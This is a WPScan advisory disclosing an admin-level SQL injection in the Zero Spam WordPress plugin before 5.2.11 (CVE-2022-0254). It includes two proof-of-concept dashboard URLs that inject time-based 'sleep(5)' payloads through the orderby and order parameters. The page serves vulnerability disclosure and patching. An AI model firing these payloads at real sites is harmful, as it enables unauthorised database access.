WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Zero Spam < 5.2.11 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection

Proof of Concept

With at least one IP in the “Blocked IPs” list:

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)

Affects Plugins

zero-spam
Fixed in version 5.2.11

References

CVE
CVE-2022-0254
URL
https://plugins.trac.wordpress.org/changeset/2660225
URL
https://plugins.trac.wordpress.org/changeset/2680906

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified

Yes

WPVDB ID
ae54681f-7b89-408c-b0ee-ba4a520db997

Timeline

Publicly Published

2022-02-18 (about 1 years ago)

Added

2022-02-18 (about 1 years ago)

Last Updated

2022-09-26 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin